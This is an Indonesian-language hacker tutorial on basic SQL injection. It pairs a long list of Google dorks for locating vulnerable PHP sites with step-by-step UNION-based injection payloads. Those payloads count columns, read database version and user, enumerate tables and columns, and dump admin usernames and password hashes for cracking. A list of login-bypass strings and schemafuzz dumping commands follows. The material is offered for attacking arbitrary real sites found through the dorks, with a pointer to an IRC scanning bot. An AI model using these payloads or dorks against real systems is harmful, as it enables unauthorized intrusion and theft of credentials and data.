inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

SQL Injection Dasar tutorial




-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
.::BELAJAR SQL INJECTION DASAR::.

Author : d0ntcry
Blog : http://d0nt-cry.blogspot.com
3.50 16 FEB 2010
FEAT. GOLIATH-MD2 and 234

Thankz : kamtiez-tukulesto-arianom-cimpli-pathloader
mbamboenk.owos.and you..
all member....
indonesiancoderTeam | kill-9 crew | SCTeam
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Assalamualaikum wr wb

Kita mulai langsung aja... kalo sudah mengerti jangan lupa lebih mendalami lagi tentang sql.. okey..
untuk mencari web vulner ato tidak
1. "-" [single mark] --> http://target.com/news.php?id=1- (id=-) 
2. "'" [single quote] --> http://target.com/news.php?id=1' atao http://target.com/news.php?id='1  (id=null'/id='null)
3. "and 1=2" --> http://target.com/news.php?id=1 and 1=2 (can you see??)*
3. !sql scan dgn bug+dork yang sudah ada... :D
4. jalan-jalan di web tersebut and be creative.. ^^

*kenapa koq tanda seperti itu ya?wah..dapet dari google se katana itu 1=2 melihatkan kalo id tersebut nilainya ERROR,contoh:
1. news.php?id=1 and 1=2   <-- nilainya salah.lah piye?ra ketok ta matane siji iku yo siji.. mosok siji iku loro rek.. wkwkwk... dan efeknya artikel web menghilang.. sakti jeh!! ato menunjukan syntax error :D
2. news.php?id=1 and 1=1   <-- nilainya benar.artikel web kembali.no page error...

Pada akhir perintah selanjutnya gunakan tanda "/*" ato "--" ato "#" menandakan akhir perintah...

OK.. lets duit..

cari kata kuncinya dulu (dork).contoh :
[SPOILER]
inurl:"shredder-categories.php?id="
inurl:"tradeCategory.php?id="
inurl:"product_ranges_view.php?ID="
inurl:"shop_category.php?id="
inurl:"product_list.php?id="
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
[/SPOILER]

waaahh.. banyak bgt!! :D
lebih gampangnya join di irc cari channel yang ada bot scan sqlnya..
jalankan botnya --> !sql d0ntcrymanis.php?idku= indonesiancoderteam (!sql <bugs> <dork>)
scriptnya bisa tnya ane di irc... 

sampe mana ya tadi... hehehehe...
oia.. da dapet webnya yg vuln.. misal :

1. http://target.com/product_list.php?id=1'   <- (You have an error in your SQL syntax....)
   - kalo gak error lakukan percobaan2 lagi dengan menambahkan.. menghilangkan.. atao apalah pokknya error.. kalo gak error ya cari target lagi.. ^^ "gak ada keamanan web yg 100% aman" <-- gak berani ngomong kaya gitu.. belum jadi 31337 :D

2. mencari nomer togel... dengan memeriksa kolom
   - syntax : order+by+1..dst --> (untuk mencari nomer akhir) pengecekan dimulai dari 1 s/d kondisi halaman mendapatkan kondisi false/error page.

   Akhirnya kondisi false diketahui pada kolom 5 :
   :: http://target.com/product_list.php?id=1 order by 1,2,3,4,5--
   (Unknown column '5' in 'order clause', Sorry, no products in this category) / bisa juga pesannya beda...
   
   atau bisa juga :
   .:. http://target.com/product_list.php?id=1 order by 1--   [gak ada error]
       http://target.com/product_list.php?id=1 order by 2--   [gak ada error]
       http://target.com/product_list.php?id=1 order by 3--   [gak ada error]
       http://target.com/product_list.php?id=1 order by 4--   [gak ada error]
       http://target.com/product_list.php?id=1 order by 5--   [error ne]

   --->  Itu tandanya kolom yang ada diweb tsb ada 4 kolom

3. Jika sudah ktemu.. cari nomer togelnya...
   - syntax : union+select 

   :: http://target.com/product_list.php?id=1 union select 1,2,3,4--
   :: http://target.com/product_list.php?id=1 union all select 1,2,3,4--
   kliatan gak nomer togelnya?? misal aja ya.. nomer yang kliatan 2 <-- nomer togel (asumsi aja)
   kalo gak kliatan ya pasang aja version() disetiap nomer atu2 :D

4. mencari informasi MySQL 
   syntax : 
   - version mysql : version() atau @@version
   - mengetahui jenis database : database()
   - mengetahui user : user()
   - lebih mudahnya, menggunakan perintah "concat()" untuk melihat semua informasi yang kita butuhkan di dalam satu tempat
   
   :: http://target.com/product_list.php?id=1 union select 1,version(),3,4--

   atau
   
   :: http://target.com/product_list.php?id=1 union select 1,concat (version(),0x3a,user(),0x3a,database()),3,4--

   taraaa....MYSQL versi 5.0.45 ( kita asumsikan aja kaya gitu..hehehe )

Untuk MySQL versi 5, kita bisa lanjutkan ke pemeriksaan tabel dan kolom.Tapi untuk versi 4, kita harus mencari dan menebak database(blind sqli),yg nama tabel dan kolom yang ditempatkan tidak beraturan. 

nb : 0x3a adalah tanda ":" yang sudah dirubah mnjdi karakter hexadecimal (untuk memisahkan informasi yang kita inginkan)

5. Memeriksa tabel 
   Syntax : 'union+select' ; "group_concat(table_name)" ; "from+information_schema.tables+where+table_schema=database()--" 
   Artinya : kita akan mengeluarkan keseluruhan tabel menggunakan information schema dimana table yang di-schema adalah
   dari fungsi query database().
   Dapat diartikan bahwa database() adalah perintah yang digunakan untuk melihat nama database

 :: id=1 union select 1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--
 Mencari tabel (limit) : 
 :: id=-1+union+select+1,table_name,3,4+from+information_schema.tables+limit+8,1--

6. Melihat Isi Kolom Dari Tabel
   Untuk mengeluarkan column name, syntax-nya sama dengan mengeluarkan table name, hanya saja "table" kita ganti dengan
   "column".

   Syntax : 
   "union+select" ; "group_concat(column_name)" ; "from+information_schema.columns+where+table_name=nama_table_target--"
   
   Artinya : kita akan mengeluarkan keseluruhan column menggunakan information schema dimana table name-nya = table yang
   jadi tujuan

   Contoh dalam tabel ada kolom "admin"
   :: id=-1+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x61646D696E--
   convert "admin" to hex -> 61646D696E


7. Melihat data dari kolom
   perintah : 'group_concat(mbohkah,cuk,raimu,asu)'  
   misal tadi kolom yang keluar dari admin : user,id,password,kentu,nangdi,matamu,suwek
   
   :: id=-1+union+select+1,group_concat(user,0x3,password),3,4+from+admin--

   jreng..jreng... dapet dah...
   d0ntcrymanis:0e311e5b9704f28b4e8557e8fa3fbe7d

   pass crack dulu :)

   macam2 hash banyak loh!!jadi harus belajar lagi.. gak cuma md5 aja.. ^^

.: Kemungkinan2 variable utk masuk kedalam login page tanpa password dan user name :D :.

1'or'1'='1

0'or'0'='0

admin'--

admin' #

admin'/* 

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

password:' or 1=1--

or 1=1--

'or'a'='a

"or"a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi') or ('a'='a

hi") or ("a"="a

'or'1'='1' and firstname <>'d0ntcry <-- nama member

'or'1'='1' and firstname <>'d0ntcry' and firstname <>'dnock


/===========.tambahan.===========\

*) ada juga dengan teknik having 1=1 SQL Injection di MS-SQL Server (google please...)
*) schemafuzz : sqli instant.hihihihi... :p
   schemafuzz.py -h  <-- melihat perintah2nya
   [+] --dbs [untuk mengetahui nama database sql]
   [+] --schema [untuk melihat nama tabel n nama column]
   [+] --dump [untuk melihat isi dari column]
   contoh : (liat target atas) nomer togel diganti dengan "darkc0de"
   1. c:/>schemafuzz.py --dbs -u "http://target.com/product_list.php?id=1 union select 1,darkc0de,3,4--
   2. c:/>schemafuzz.py --schema -u "http://target.com/product_list.php?id=1 union select 1,darkc0de,3,4--" -D <nama database>
   3. c:/>schemafuzz.py --dump -u "http://target.com/product_list.php?id=1 union select 1,darkc0de,3,4--" -T <nama_tabel> -C <nama_kolom1,nama_kolom2,nama_kolom3> -D <nama_database>
*) tools2 sqli yang bisa didapatkan di forum2 security...


   
sabaiknya coba cara manual dulu sebelum pake tools/python...
Matur nuwun.. kalo ada kekurangan mohon dimaafkan coz bisanya cuma maen2 kaya gini aja gak bisa nangkalnya.. urung dong bgt sqlan.. tapi berkat temen2 yang mau share pasti aq bisa..hohohohoho...^^


salam hangat,


d0ntcry,
waalaikum salam wr.wb


----.end.of.fles.----